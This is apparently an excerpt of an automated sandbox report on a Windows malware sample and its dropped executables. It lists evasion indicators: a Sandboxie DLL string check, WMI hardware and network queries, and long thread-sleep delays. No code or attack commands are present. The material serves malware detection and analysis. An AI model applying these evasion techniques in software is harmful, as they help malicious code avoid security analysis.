                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMemory allocated: 910000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMemory allocated: 44A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeMemory allocated: 4DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 1790000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 30D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 50D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMemory allocated: 1380000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMemory allocated: 2C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeMemory allocated: 4C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 13B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 2F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 2CF0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWindow / User API: threadDelayed 7374Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWindow / User API: threadDelayed 1923Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeWindow / User API: threadDelayed 3372Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeWindow / User API: threadDelayed 1650Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWindow / User API: threadDelayed 1358Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWindow / User API: threadDelayed 4720Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 2196
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 4986
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 5721
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 1653
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7560Thread sleep count: 7374 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7560Thread sleep count: 1923 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99764s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99655s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -99109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98670s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98543s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -98179s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97998s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97796s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97575s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97124s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -97015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96901s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96230s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -96109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95888s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95435s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95324s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95194s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -95078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -94956s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528Thread sleep time: -94830s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -99854s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7908Thread sleep count: 3372 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7908Thread sleep count: 1650 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -99704s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -99578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -99452s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -99330s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -99055s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -98860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -98735s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -98534s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -98407s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -98282s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -98157s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -98032s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97813s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97688s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97563s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97422s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97294s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97184s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -97075s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96946s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96824s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96716s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96573s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96467s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96356s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96213s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884Thread sleep time: -96090s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8100Thread sleep count: 1358 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -99828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -99520s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -99292s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8100Thread sleep count: 4720 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -99148s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -98000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97871s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97762s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97193s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -97074s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -96953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -96464s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -96357s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -96249s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -96125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -96015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -95906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -95797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -95687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -95578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -95468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -95359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -23058430092136925s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2852Thread sleep count: 2196 > 30
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99886s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2676Thread sleep count: 4986 > 30
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -99000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -98891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -98766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -98641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -98479s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -98341s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -98187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -98075s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -97094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96546s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -96078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -95967s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280Thread sleep time: -95789s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -23058430092136925s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2640Thread sleep count: 5721 > 30
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2640Thread sleep count: 1653 > 30
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99532s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99407s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -99063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98938s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98813s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98688s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98344s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98235s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -98110s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97985s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97840s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97715s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97493s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97375s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97266s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97141s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -97016s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96907s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96782s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96657s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -96063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -95938s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -95828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -95719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#2056119.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ishon.exeLast function: Thread delayed
